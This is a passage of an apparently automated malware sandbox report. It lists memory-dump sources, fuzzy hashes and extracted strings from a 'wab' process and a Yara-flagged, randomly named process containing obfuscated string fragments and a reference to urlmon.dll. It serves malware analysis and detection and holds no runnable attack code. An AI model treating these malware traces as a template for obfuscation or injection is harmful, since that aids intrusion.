                    • Instruction ID: 424d48c83904c6a88f9caea7ee076e0500b92d133c49e9da55ef16b22032e4c3
                    • Opcode Fuzzy Hash: cbbd941aaa4190118441c6da622c539598e805f209bc24ed812c23768cd3ce2e
                    • Instruction Fuzzy Hash: A990023920180402E100715D4848747100657D0706F55C061A5164515EC666CE956631
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4854f58fd535a55668d7459a6b3331b81aa14b48f163297803e8a5b65dd3066e
                    • Instruction ID: f04c902440a217419e2cbff9e221164669a5c1304b52fee02f72120d6d060266
                    • Opcode Fuzzy Hash: 4854f58fd535a55668d7459a6b3331b81aa14b48f163297803e8a5b65dd3066e
                    • Instruction Fuzzy Hash: A290023920180402E100715D485470B100657D0706F55C061A1164515DC6268E556671
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ec755f9b542ed621c2a789bcd29f30f74a70c1b6d26af4a3774df63d365710e5
                    • Instruction ID: 7ce1744464816a7422cee56fe902b1ff5cddbb74f6d5a31b18e477e7bdb96ee2
                    • Opcode Fuzzy Hash: ec755f9b542ed621c2a789bcd29f30f74a70c1b6d26af4a3774df63d365710e5
                    • Instruction Fuzzy Hash: 90900229211C0042E200756D4C54B07100657D0707F55C165A0154514CC9168E655621
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 34a953c3c57e4ee8a97aa2805683bbd26684d17a26ead0b0c74aeaf680acb0eb
                    • Instruction ID: 10371e42ce4f696a2b3489fec484a652f9983d6842fe0ccd0d8c52f9c31cf616
                    • Opcode Fuzzy Hash: 34a953c3c57e4ee8a97aa2805683bbd26684d17a26ead0b0c74aeaf680acb0eb
                    • Instruction Fuzzy Hash: 9B90022930140402E102715D4454606100A97D1749F95C062E1424515DC6268F57A232
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ac71535a1e7a4a1493189f70232695576801c6658f4393a670afe864b7728d8f
                    • Instruction ID: 69fd4edb8504880d0f428222e0721580440dbbd14c434eab6e47e4b24cedb0c5
                    • Opcode Fuzzy Hash: ac71535a1e7a4a1493189f70232695576801c6658f4393a670afe864b7728d8f
                    • Instruction Fuzzy Hash: CB90027920140402E140715D4444746100657D0705F55C061A5064514EC65A8FD96765
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 672ade48cea61ba19d4be9e6c2c28c937e3a9d911a6ee569d82fad11bbb3136b
                    • Instruction ID: a0c26260eab36e0373f4d970147141e1b5255e5db31cdd80d993d79f9e2adc8f
                    • Opcode Fuzzy Hash: 672ade48cea61ba19d4be9e6c2c28c937e3a9d911a6ee569d82fad11bbb3136b
                    • Instruction Fuzzy Hash: 2E90022960140502E101715D4444616100B57D0645F95C072A1024515ECA268F96A231
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 42eee7c7f5842fc1170e333e2751848afe130246cc0802dcb0524039d24df91f
                    • Instruction ID: e3cf561e25c97d4ed1f97c31ff1bf9881187909186f88a44899be2ef0fae60ad
                    • Opcode Fuzzy Hash: 42eee7c7f5842fc1170e333e2751848afe130246cc0802dcb0524039d24df91f
                    • Instruction Fuzzy Hash: AF90026920180403E140755D4844607100657D0706F55C061A2064515ECA2A8E556235
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd

                    Control-flow Graph
                    APIs
                    Strings
                    Similarity
                    • API ID: ___swprintf_l
                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                    • API String ID: 48624451-2108815105

                    Control-flow Graph
                    APIs
                    Strings
                    Similarity
                    • API ID: ___swprintf_l
                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                    • API String ID: 48624451-2108815105

                    Control-flow Graph
                    Strings
                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 213E4725
                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 213E46FC
                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 213E4655
                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 213E4742
                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 213E4787
                    • ExecuteOptions, xrefs: 213E46A0
                    • Execute=1, xrefs: 213E4713
                    Similarity
                    • API ID:
                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                    • API String ID: 0-484625025
                    APIs
                    Strings
                    Similarity
                    • API ID: __aulldvrm
                    • String ID: +$-$0$0
                    • API String ID: 1302938615-699404926
                    Strings
                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 213E02BD
                    • RTL: Re-Waiting, xrefs: 213E031E
                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 213E02E7
                    Similarity
                    • API ID:
                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                    • API String ID: 0-2474120054
                    Strings
                    • RTL: Re-Waiting, xrefs: 213E7BAC
                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 213E7B7F
                    • RTL: Resource at %p, xrefs: 213E7B8E
                    Similarity
                    • API ID:
                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                    • API String ID: 0-871070163
                    APIs
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 213E728C
                    Strings
                    • RTL: Re-Waiting, xrefs: 213E72C1
                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 213E7294
                    • RTL: Resource at %p, xrefs: 213E72A3
                    Similarity
                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                    • API String ID: 885266447-605551621
                    APIs
                    Strings
                    Similarity
                    • API ID: ___swprintf_l
                    • String ID: %%%u$]:%u
                    • API String ID: 48624451-3050659472
                    APIs
                    Strings
                    Similarity
                    • API ID: __aulldvrm
                    • String ID: +$-
                    • API String ID: 1302938615-2137968064
                    Strings
                    Similarity
                    • API ID:
                    • String ID: $$@
                    • API String ID: 0-1194432280
                    Strings
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: "z$$$$$$%E$)n$-*$-O$-e$.D$.]$/$/$/-$1$@$B$B$H$K$LP$MI$Rw$R|$V$V!$^$`$b$d($e${*$1$9
                    • API String ID: 0-3973920184
                    Strings
                    Similarity
                    • API ID:
                    • String ID: 6$O$S$\$s
                    • API String ID: 0-3854637164
                    Strings
                    Similarity
                    • API ID:
                    • String ID: Ao$u>
                    • API String ID: 0-1821974421
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 57147239b44ef1d29857aa3d66b275ece1686b6a610650e974492640e68748ec
                    • Instruction ID: 7001751294e51baace2ae113db5c055478d29bb5cc9d452bee762bfbe7806f3f
                    • Opcode Fuzzy Hash: 57147239b44ef1d29857aa3d66b275ece1686b6a610650e974492640e68748ec
                    • Instruction Fuzzy Hash: 2C211DB5A00609AFDB14DF99DC45EAB77B8EF89710F108609FD18D7240D770A9518BA1
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a7adbcfa4f0add5f962326dbc1504fae2a65528200220ea98d4f18d971da3eab
                    • Instruction ID: 6650639af33fa5e180788915eaccf97477829baea845f1a61026bfd667aff336
                    • Opcode Fuzzy Hash: a7adbcfa4f0add5f962326dbc1504fae2a65528200220ea98d4f18d971da3eab
                    • Instruction Fuzzy Hash: 211191759007057BD720EB69DC45FAB77BCEF89310F008509FE18DB280EB7165108BA1
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 78256cddf642865f94fb0f6f0988303c5efcfbdaf19f3c59a4da2679db52dc8c
                    • Instruction ID: 446d6842051764a6cf84245b7d0e0f1134f5b0530ff628dc13c2e19ce18c29db
                    • Opcode Fuzzy Hash: 78256cddf642865f94fb0f6f0988303c5efcfbdaf19f3c59a4da2679db52dc8c
                    • Instruction Fuzzy Hash: 2D11ECF6D0121DAF9B40DFA9D9409EFBBF8EF88700F04416AE919E7200E7705A148BA1
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 721853e0717aed0137ac124d5e12327b15061fa6eaad6225241bc2ede823d4c5
                    • Instruction ID: a18601707e7cf3021d33b5bbde4dee82d69ffa5363eb509b721e34f9a0fd52aa
                    • Opcode Fuzzy Hash: 721853e0717aed0137ac124d5e12327b15061fa6eaad6225241bc2ede823d4c5
                    • Instruction Fuzzy Hash: 73113A75A007047FD620EB69DC45FABB7ACEF89710F018549FE18DB280EB71A9118BA1
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 450cb9c7663112ca210b0cb6c60cfdfedc45c319147f1a5182a9a80414c57d4f
                    • Instruction ID: 802d8876345b370866929718f477bb878ac15a7a76631781d4b6c3cfd583ced8
                    • Opcode Fuzzy Hash: 450cb9c7663112ca210b0cb6c60cfdfedc45c319147f1a5182a9a80414c57d4f
                    • Instruction Fuzzy Hash: 2401CCB2200609BBCB14DE89DC84EEB77ADAF8C714F018208BA09E7240D630F8518BA4
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d4d9e18442c034a6d1c0e34cb45da3528f9018b2d65717231f0997bf664d55d5
                    • Instruction ID: 1aefefe0bd8198934a3f3dfdae3ab5af19c1f0a0c888ca780b542f0d94d7ec6d
                    • Opcode Fuzzy Hash: d4d9e18442c034a6d1c0e34cb45da3528f9018b2d65717231f0997bf664d55d5
                    • Instruction Fuzzy Hash: F3F0F6732003162BD710AA2D9C84B87F79CEB89334F110222F92CCB241D67294158390
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9def3a84266962d4f552916792aba8a09b4ecf02272c456a6a249810f305bf98
                    • Instruction ID: 2466714bac11c85f4b916600f78de1889d52a89fe02985e44dafd2c1dddf6413
                    • Opcode Fuzzy Hash: 9def3a84266962d4f552916792aba8a09b4ecf02272c456a6a249810f305bf98
                    • Instruction Fuzzy Hash: 1501E9FAC0121DAFCB40DFE8D9409EEBBF8AB48200F14426AD919F7200F7755A048BA1
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3831e38d0f1520392d2e538a41e312410c75e2cb95c2f7a640432c2e3e1438d1
                    • Instruction ID: 77a195719d9281caf0d91e667e39069268d5a1c9a923939f41662b179c83dd7b
                    • Opcode Fuzzy Hash: 3831e38d0f1520392d2e538a41e312410c75e2cb95c2f7a640432c2e3e1438d1
                    • Instruction Fuzzy Hash: A2F0F8B56006057FC710EE99DC45EAB77ACEF89650F008109BE18D7241D670B9118BB1
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ed592dfed463adf66a7e35798911d3c5fe923e8226bf3130026c1952ef4f2681
                    • Instruction ID: f91bc0bba4f6d91647c83ab857c6750df15d54649e2d823f55ba220cfed188fd
                    • Opcode Fuzzy Hash: ed592dfed463adf66a7e35798911d3c5fe923e8226bf3130026c1952ef4f2681
                    • Instruction Fuzzy Hash: C6F08275C09249EBDF14DF68D841BDEBBB8EB04320F1083AAE824DB2C0E63497508781
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 504fe083870a0fa2096c11ce1490c744b46d51673e052a9510a6b519a7afd9aa
                    • Instruction ID: c2982ad87cb0e164d5bf59d9187138e0d6971e1a6f525dbac1b7f8a552fb1d04
                    • Opcode Fuzzy Hash: 504fe083870a0fa2096c11ce1490c744b46d51673e052a9510a6b519a7afd9aa
                    • Instruction Fuzzy Hash: 1EE065B66042047BD624EE99DC49FEB73ACEF8A710F004019FA08EB240D630B910CAB5
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 28e99eae625116fa1876087960d92f7e841b892ab241dc61725a62769b807db2
                    • Instruction ID: dc1e341a9fcc07dc71e75135c7add87b04be161948115dd440bd81bded0926df
                    • Opcode Fuzzy Hash: 28e99eae625116fa1876087960d92f7e841b892ab241dc61725a62769b807db2
                    • Instruction Fuzzy Hash: 23E0DF3660061227D220A18DCC05F97B75C8BC0A28F0E0024FE08DF300E261A91082E8
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9cabf88f7ebf607d24702660be94398df66291ecf44b2da18a7e530c6de45284
                    • Instruction ID: 5708f322a6b7a3b5f8cb33287fafe9d967de385c55a505d4146255a348ea812b
                    • Opcode Fuzzy Hash: 9cabf88f7ebf607d24702660be94398df66291ecf44b2da18a7e530c6de45284
                    • Instruction Fuzzy Hash: B5E0467A2016047BD620EB6ACC09EDB77ADDFCA760F418415FA08AB241CA71B9108AF0
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9382b98407feac2b9cf2b2466ea54af440cb9e950fed6df6a9fb7227d893ab8b
                    • Instruction ID: ff3df7b9ed5dd41c0d792b9cf9ca5b89c3e6516a55d65f9c6b404aaa5c5aac2b
                    • Opcode Fuzzy Hash: 9382b98407feac2b9cf2b2466ea54af440cb9e950fed6df6a9fb7227d893ab8b
                    • Instruction Fuzzy Hash: B4A0228E000202200C32323C3B008A30F3288830B82C20220E0A3EC22BC380CAB0A002
                    Strings
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                    • API String ID: 0-3248090998
                    • Opcode ID: 36ec1750e68b86c0bcc5e55fc4f0e1a308ef9268d55ba95c02ad922fcb1f333b
                    • Instruction ID: 20a7ef1bec9f3b382374c52d68a48da33bafc6d6c03ce96848af399c1a52e81b
                    • Opcode Fuzzy Hash: 36ec1750e68b86c0bcc5e55fc4f0e1a308ef9268d55ba95c02ad922fcb1f333b
                    • Instruction Fuzzy Hash: 4391FFF08052A98EDB118F55A4603DFBF71BB85204F1581E9C6AA7B243C3BE4E46DF90
                    Strings
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: &";$ ;%5$!%&;$#$#!<5$#;$.$$ "5$&";&$&";&#$&#5=$5BZB$5[A5$;%;'$=B|{$Ftst$Rpv~$Teey$Xzo|$Y95y$^]AX$^|a:$g|: $p:!!$pBpw$qzbf$yyt:$z<5V$|~p5$}gzx
                    • API String ID: 0-1864101840
                    • Opcode ID: 6669d24830f2ddc8a7a436d3351cb22f26dc9d56462e166f44be692c93ae7a2b
                    • Instruction ID: bdee0b20475d3eb1b5b5fabc195a47b8af0a21dac3db2aff2bee8107f9ae5162
                    • Opcode Fuzzy Hash: 6669d24830f2ddc8a7a436d3351cb22f26dc9d56462e166f44be692c93ae7a2b
                    • Instruction Fuzzy Hash: 4D21BCB5C102589BCB14CFD6E9846EEBB74BB05340F60924CE4296F258D3765A42CF99
                    Strings
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                    • API String ID: 0-1002149817
                    • Opcode ID: c4c1164c8ffbc00c798c4cf91f2794285e24993db59e7595ee0764830dab720d
                    • Instruction ID: f4aee0a014cba075d1a84fdee94287ffe5f7d4a223d5b53d7f4e87cf4610af42
                    • Opcode Fuzzy Hash: c4c1164c8ffbc00c798c4cf91f2794285e24993db59e7595ee0764830dab720d
                    • Instruction Fuzzy Hash: 14C11CB5D003689EDF20DFA4CD44BEEBBB9AF45304F00819AD54CEB241E7B54A889F95
                    Strings
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                    • API String ID: 0-3236418099
                    • Opcode ID: 5862cd32550569fcbda4b7835447c02b9650c6f60e4ad67d72d48df33767f25a
                    • Instruction ID: c0590c4b5c42adc1db86e3946b4d8b34fba3fdfbe44b356fb86026584a89d5c9
                    • Opcode Fuzzy Hash: 5862cd32550569fcbda4b7835447c02b9650c6f60e4ad67d72d48df33767f25a
                    • Instruction Fuzzy Hash: 1A9161B5D00319AAEB20EF94DC85FEEB7B9AF44704F0541A9E608EA140EB715B84DF61
                    Strings
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                    • API String ID: 0-392141074
                    • Opcode ID: 5cebb1740e5f88ec5179f83979617af4a926e2c772e2c152ecd864d12fc48798
                    • Instruction ID: 59d73b37c863757561be93a765a922684707e63f9d91bac95971f791dad8f613
                    • Opcode Fuzzy Hash: 5cebb1740e5f88ec5179f83979617af4a926e2c772e2c152ecd864d12fc48798
                    • Instruction Fuzzy Hash: 25712FB5D10718AADB25EF94CC40FEEB77DBF08704F04419DE608EA180EB7567449B95
                    Strings
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: "$"$"$.$/$P$e$i$m$o$r$x
                    • API String ID: 0-2356907671
                    • Opcode ID: 5efd6b896f3c161d912402de7ace7b3629155e4fa029c162924957ad6f496c61
                    • Instruction ID: 767cadad492a36d9b00d652564b499724eab64058e348edce441e1125d6a0a1b
                    • Opcode Fuzzy Hash: 5efd6b896f3c161d912402de7ace7b3629155e4fa029c162924957ad6f496c61
                    • Instruction Fuzzy Hash: 2B81E6B6C003196ADB51EBA8CC80FEF77BDAF44708F0441A9A50CEA141EB755798DFA1
                    Strings
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: D$\$e$e$i$l$n$r$r$w$x
                    • API String ID: 0-685823316
                    • Opcode ID: b01e59beeb9904132a8481184cb4c58e87c8b9381759d458ce3843d2d065c611
                    • Instruction ID: 6518e4e4efa642d2d23b0a6c66421f226555b6614494c23d651f0e6b0484049d
                    • Opcode Fuzzy Hash: b01e59beeb9904132a8481184cb4c58e87c8b9381759d458ce3843d2d065c611
                    • Instruction Fuzzy Hash: CB3184B5C15358AEEF50DF94CC84BEEBBB9BF04304F14818DE508BA180DBB51648CB65
                    Strings
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: :$:$:$A$I$N$P$m$s$t
                    • API String ID: 0-2304485323
                    • Opcode ID: 6a54a70c63ec86b88be1296287c025cd3f366a766c51788dee5bdf074bcf4b5b
                    • Instruction ID: ed964ea3ab4c578648b6f7bd68c29a9358a1034bc4e51f4c1cc4ab5c980c698e
                    • Opcode Fuzzy Hash: 6a54a70c63ec86b88be1296287c025cd3f366a766c51788dee5bdf074bcf4b5b
